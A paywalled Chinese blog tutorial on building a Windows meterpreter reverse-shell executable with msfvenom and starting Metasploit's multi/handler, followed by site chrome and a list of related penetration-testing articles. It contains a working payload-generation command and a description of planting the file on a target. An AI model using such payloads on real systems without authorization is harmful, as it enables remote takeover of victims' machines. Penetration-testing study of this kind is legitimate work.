metasploit-framework教程（msfvenom实战篇）

原创

已于 2024-02-25 10:24:18 修改 · 647 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#linux #bash

于 2024-02-25 10:24:02 首次发布

本教程介绍了如何使用msfvenom制造病毒并配置multi/handler。首先，通过msfvenom生成病毒并将其复制到靶机。接着，在metasploit中设置LHOST为自己的IP地址以监听。当payload与默认值不一致时，需要重新设定以保持一致。在运行靶机病毒并输入`run`后，可能会遇到bad-config错误，解决方法是执行特定代码。

1.制造病毒

先使用上篇说过的msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe > shell.exe

接着，把生成的病毒复制到靶机上

2.配置multi/handler 打开metasploit

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

lowtune

关注关注

6
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

渗透测试18---Metasploit 实战

初遇我ㄖ寸の热情呢？

04-14

7959

Metasploit简称msf （msf5>banner 看一些花里胡哨的东西） 1.nmap与msf配合的完整案例 nmap与msf配合的流程 0.漏洞发布：无论是操作系统层次还是应用层次的，都会发布漏洞（比如：MS08-067）。我们要关注信息。(微软的漏洞都会以MS开头，其他漏洞可能是CVE-之类的，search的时候可以查找到) 有时候会发布在公共的平台里面 1.确定需求...

Metasploit框架进行渗透测试实战

悦分享

12-21

1021

2003年左右，美国的H. D. Moore（世界知名黑客）和Spoonm创建了一个集成多个漏洞渗透工具的框架。随后，这个框架在2004年的Black Hat Briefings上备受关注，Spoonm在大会的演讲中提到，Metasploit的使用方法非常简单，以至于你只需要找到一个目标，单击几下鼠标就可以完成渗透，一切就和电影里面演的一样酷。强大的功能再加上简单的操作使得Metasploit在安全行业迅速传播，Metasploit很快成为业内著名的工具。

参与评论您还未登录，请先登录后发表或查看评论

MetaSploit实战

yuehuajiang7的博客

01-17

420

MS08-067和MS17-010 前期准备 kali Linux自带Metasploit，直接使用命令msfconsole启动即可 1.软件配置 2、建立搜索缓存（数据库）启动PostgreSQL数据库服务：service postgresql start监听5432端口初始化Metasploit数据库:msfdb init 查看数据库连接情况:msfconsole db_status 2.漏洞扫描目标靶机为 Windows xp professional（因为后来换了一个系统，所以ip会不一

Msfvenom详细教程

qq_41245301的博客

12-18

1121

Msfvenom 是一个用来生成后门的软件，Msfvenom是Msfpayload和msfencode的组合，将这两个工具都放在一个Framework实例中，自2015年6月8日起，msfvenom替换了msfpayload和msfencode。

Metasploit漏洞攻击实战

04-12

Metasploit漏洞攻击实战

【渗透测试框架】Metasploit-Framework(MSF)安装与使用

李同學的安全圈

05-23

8150

文章目录前言一、Metasploit简介二、Metasploit安装及更新一键安装更新Metasploit三、Metasploit数据库连接四、Metasploit模块介绍Exploit模块Payload模块常见的几种 Stagers PayloadMeterpreter五、Metasploit实战攻击六、后渗透攻击阶段后渗透常用命令POST后渗透常用模块生成持续性后门程序Metasploit Socks代理PowerShell脚本(域内信息收集)加载stdapi升级会话SessionMeterpreter

渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

墨鱼菜鸡

07-11

5205

白嫖 Metasploit Pro 2022：https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022：http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro：https://www.52pojie.cn/thr...

Metasploit Framework与Msfvenom在内网渗透技术实战

Metasploit Framework简介 ## 1.1 Metasploit框架概述 Metasploit Framework是一款开源的渗透测试工具，由Rapid7公司开发和维护。它提供了一套完整的工具集，用于评估和测试目标系统的安全性。Metasploit框架具有...

Metasploit-Framework(MSF) 进阶实战

悦分享

11-28

1129

Metasploit框架是每个测试人员工具包中的一种多用途资产，看到它不断的扩展并不令人震惊。由于框架的开放性，随着新技术和漏洞的出现，它们被非常迅速地整合到msf svn trunk中，或者最终用户编写他们自己的模块并在他们认为合适的情况下共享它们。

漏洞验证之metasploit实战

whoim_i的博客

10-23

5850

一、metasploit简介 Metasploit 是一款开源的渗透测试框架平台，可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的 Metasploit 是采用 Perl 语言编写的，但是再后来的新版中，改成了用 Ruby 语言编写的了，这使得使用者能够根据需要对模块进行适当修改，甚至是调用自己写的测试模块。到目前为止，msf 已经内置了...

msfvenom

煮酒闲谈

09-22

4587

摘要在kali2.0的环境上，因为msfpayload没有了，被整合进了msfvenom，所以该博文记录一些关于msfvenom使用技巧。msfvenom：>>> msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfp

Msfvenom使用指南

m0_57221101的博客

02-08

6475

参数总结 1. –p (- -payload-options) 添加载荷payload。载荷这个东西比较多，这个软件就是根据对应的载荷payload生成对应平台下的后门，所以只有选对payload，再填写正确自己的IP，PORT就可以生成对应语言，对应平台的后门了！！！ (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f （- -help-formats）输出文件格式。 (- -help-form

Kali 利用 msfvenom 渗透 Windows 系统教程

xzc123111的博客

05-28

625

是一款开源的渗透测试工具，用于开发、测试和执行漏洞利用程序。msfvenom是 Metasploit 中的 Payload 生成工具，融合了旧版本的msfpayload与msfencode。可用于生成后门程序，便于进行远程控制、提权等渗透测试任务。

网络攻防作业——Msfvenom的使用

yyy7654321的博客

06-28

4457

2. 利用建立的监听连接，进行渗透测试操作（上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等）。1.利用Msfvenom生成木马，并进行免杀处理，再利用msfconsole进行监听；3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件，开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。

Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程，具体做什么 -永恒之蓝漏洞

天下著书立传者，皆为我师

04-24

3377

渗透测试实战练习1——永恒之蓝漏洞（渗透攻击 Win7 主机并远程执行命令）以及mysql空密码扫描利用（获取mysql数据库中信息）

msfvenom学习

weixin_34377919的博客

05-07

211

现在依然还有很多教学视频、资料是使用之前的kali版本。随着更新有些命令是不适应最新的kali的。（也是掉过坑的人）msfvenom集成了msfpayload和msfencode，2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。 msfvenom重要参数：（可以使用msfvenom -h查看所有参数）-p payload设置 -e 编码设置-a 系统结构，默认x86-s payl...

使用msfvenom实现远程控制.

2301_78457119的博客

06-24

1166

在Kali 2中生成被控端的工具：msfvenom（msfvenom是渗透测试工具Metasploit中的一个命令）1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。

Msfvenom生成木马实验

m0_74025111的博客

04-24

2016

编码处理型：msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马，将payload。

视频教程-Metasploit Framework渗透框架与Msfvenom木马攻防基础到实战技巧-渗透测试

weixin_33947990的博客

05-28

266

Metasploit Framework渗透框架与Msfvenom木马攻防基础到实战技巧 ...

Metasploit Framework的全面介绍